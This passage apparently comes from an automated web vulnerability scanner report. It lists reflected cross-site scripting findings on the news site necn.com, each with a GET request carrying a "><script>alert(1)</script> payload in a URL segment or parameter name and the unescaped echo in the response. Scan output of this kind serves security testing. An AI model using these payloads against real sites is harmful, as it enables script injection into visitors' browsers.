GET /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-decbff77"><script>alert(1)</script>a29c90745a1/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=f4bb7279c6dc802b2fa13fd549830b2d; path=/
Expires: Sun, 19 Dec 2010 18:42:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-decbff77"><script>alert(1)</script>a29c90745a1/landing.html">
...[SNIP]...

2.522. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f02b"><script>alert(1)</script>b4a31179593 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html?9f02b"><script>alert(1)</script>b4a31179593=1 HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44852
Content-Type: text/html
Set-Cookie: PHPSESSID=99f484b06ae8e7beebde2bc6c3612e53; path=/
Expires: Sun, 19 Dec 2010 18:42:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:42 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="9f02b"><script>alert(1)</script>b4a31179593" id = "9f02b">
...[SNIP]...

2.523. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Holiday-mad-dash/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88b8"><script>alert(1)</script>728977ee5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a88b8"><script>alert(1)</script>728977ee5f2/19/10/Holiday-mad-dash/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44750
Content-Type: text/html
Set-Cookie: PHPSESSID=e24cde4c3a04724bef9fe26bc905c38a; path=/
Expires: Sun, 19 Dec 2010 18:42:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a88b8"><script>alert(1)</script>728977ee5f2/19/10/Holiday-mad-dash/landing.html">
...[SNIP]...

2.524. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Holiday-mad-dash/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bac"><script>alert(1)</script>808ccd5b970 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1921bac"><script>alert(1)</script>808ccd5b970/10/Holiday-mad-dash/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44731
Content-Type: text/html
Set-Cookie: PHPSESSID=a009713ce989df18102c243578949687; path=/
Expires: Sun, 19 Dec 2010 18:42:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1921bac"><script>alert(1)</script>808ccd5b970/10/Holiday-mad-dash/landing.html">
...[SNIP]...

2.525. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Holiday-mad-dash/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ca7"><script>alert(1)</script>fe484db570f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/1049ca7"><script>alert(1)</script>fe484db570f/Holiday-mad-dash/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44750
Content-Type: text/html
Set-Cookie: PHPSESSID=f12205855efefc6c0f7e380c6587b691; path=/
Expires: Sun, 19 Dec 2010 18:42:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/1049ca7"><script>alert(1)</script>fe484db570f/Holiday-mad-dash/landing.html">
...[SNIP]...

2.526. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Holiday-mad-dash/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e588e"><script>alert(1)</script>4ea27e8753e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Holiday-mad-dashe588e"><script>alert(1)</script>4ea27e8753e/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44750
Content-Type: text/html
Set-Cookie: PHPSESSID=af353e044142f9e0427a8d0d4d46add5; path=/
Expires: Sun, 19 Dec 2010 18:42:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Holiday-mad-dashe588e"><script>alert(1)</script>4ea27e8753e/landing.html">
...[SNIP]...

2.527. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Holiday-mad-dash/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52c8"><script>alert(1)</script>90de578ba5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Holiday-mad-dash/landing.html?c52c8"><script>alert(1)</script>90de578ba5a=1 HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44737
Content-Type: text/html
Set-Cookie: PHPSESSID=11d20b943b6ac7b9c0f53cbbb62f208a; path=/
Expires: Sun, 19 Dec 2010 18:42:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="c52c8"><script>alert(1)</script>90de578ba5a" id = "c52c8">
...[SNIP]...

2.528. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc0b"><script>alert(1)</script>fdc2925be5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /123dc0b"><script>alert(1)</script>fdc2925be5f/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44827
Content-Type: text/html
Set-Cookie: PHPSESSID=006b23cb6c4b6c1dd81e71fc7034f853; path=/
Expires: Sun, 19 Dec 2010 18:42:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/123dc0b"><script>alert(1)</script>fdc2925be5f/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html">
...[SNIP]...

2.529. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78d69"><script>alert(1)</script>5097c19b3b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1978d69"><script>alert(1)</script>5097c19b3b8/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44827
Content-Type: text/html
Set-Cookie: PHPSESSID=af45f10b65ea1c276a93d609e49f5979; path=/
Expires: Sun, 19 Dec 2010 18:42:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1978d69"><script>alert(1)</script>5097c19b3b8/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html">
...[SNIP]...

2.530. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80369"><script>alert(1)</script>b78a22fbae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/1080369"><script>alert(1)</script>b78a22fbae5/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44827
Content-Type: text/html
Set-Cookie: PHPSESSID=42aa0e7c2017c0492a8198e20dd2de79; path=/
Expires: Sun, 19 Dec 2010 18:42:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/1080369"><script>alert(1)</script>b78a22fbae5/Man-in-custody-for-Taunton-Mass-stabbing/landing.html">
...[SNIP]...

2.531. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbc3"><script>alert(1)</script>8d5270c27c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing1fbc3"><script>alert(1)</script>8d5270c27c8/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=e8c9d91d47e0f31b790659bbf41ca672; path=/
Expires: Sun, 19 Dec 2010 18:43:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing1fbc3"><script>alert(1)</script>8d5270c27c8/landing.html">
...[SNIP]...

2.532. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5d2"><script>alert(1)</script>0cd921c4439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html?9f5d2"><script>alert(1)</script>0cd921c4439=1 HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44852
Content-Type: text/html
Set-Cookie: PHPSESSID=09f0a5b1844615e3b04c6d13ab6e3122; path=/
Expires: Sun, 19 Dec 2010 18:42:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:42:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="9f5d2"><script>alert(1)</script>0cd921c4439" id = "9f5d2">
...[SNIP]...

2.533. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe03"><script>alert(1)</script>f9d7a14be0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /123fe03"><script>alert(1)</script>f9d7a14be0a/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=9bc0ec5f4bd8ad827ce4d8bffa25ce73; path=/
Expires: Sun, 19 Dec 2010 18:43:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/123fe03"><script>alert(1)</script>f9d7a14be0a/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html">
...[SNIP]...

2.534. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb4d"><script>alert(1)</script>c05fe6991af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19cfb4d"><script>alert(1)</script>c05fe6991af/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=a3809f6928c3b3f369e3a33342053db4; path=/
Expires: Sun, 19 Dec 2010 18:43:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19cfb4d"><script>alert(1)</script>c05fe6991af/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html">
...[SNIP]...

2.535. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be646"><script>alert(1)</script>c703651383b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10be646"><script>alert(1)</script>c703651383b/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44846
Content-Type: text/html
Set-Cookie: PHPSESSID=8851f21148f3ff01ea7be5b8f3420ce4; path=/
Expires: Sun, 19 Dec 2010 18:43:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10be646"><script>alert(1)</script>c703651383b/Memorial-Bridge-reopens-ahead-of-schedul/landing.html">
...[SNIP]...

2.536. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48d6"><script>alert(1)</script>90a1948cf94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Memorial-Bridge-reopens-ahead-of-scheduld48d6"><script>alert(1)</script>90a1948cf94/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44827
Content-Type: text/html
Set-Cookie: PHPSESSID=dd8b2d9e649890dcb845960a53659158; path=/
Expires: Sun, 19 Dec 2010 18:43:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Memorial-Bridge-reopens-ahead-of-scheduld48d6"><script>alert(1)</script>90a1948cf94/landing.html">
...[SNIP]...

2.537. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56cb5"><script>alert(1)</script>8f530fb264b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html?56cb5"><script>alert(1)</script>8f530fb264b=1 HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44852
Content-Type: text/html
Set-Cookie: PHPSESSID=f4ec1720e971c572d17673dfaeda3d74; path=/
Expires: Sun, 19 Dec 2010 18:43:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="56cb5"><script>alert(1)</script>8f530fb264b" id = "56cb5">
...[SNIP]...

2.538. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 916b0"><script>alert(1)</script>e6f6bbfb313 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12916b0"><script>alert(1)</script>e6f6bbfb313/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44807
Content-Type: text/html
Set-Cookie: PHPSESSID=c0eec1dfd3f848e6aa7ba54853b82d70; path=/
Expires: Sun, 19 Dec 2010 18:43:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12916b0"><script>alert(1)</script>e6f6bbfb313/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html">
...[SNIP]...

2.539. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c822c"><script>alert(1)</script>f826765c263 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19c822c"><script>alert(1)</script>f826765c263/10/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1
Host: www.necn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 44826
Content-Type: text/html
Set-Cookie: PHPSESSID=b75bc57ca65d1a6b877b11f6f63977b7; path=/
Expires: Sun, 19 Dec 2010 18:43:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:43:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19c822c"><script>alert(1)</script>f826765c263/10/Sunday-noon-forecast-Sun-and-clouds/landing.html">
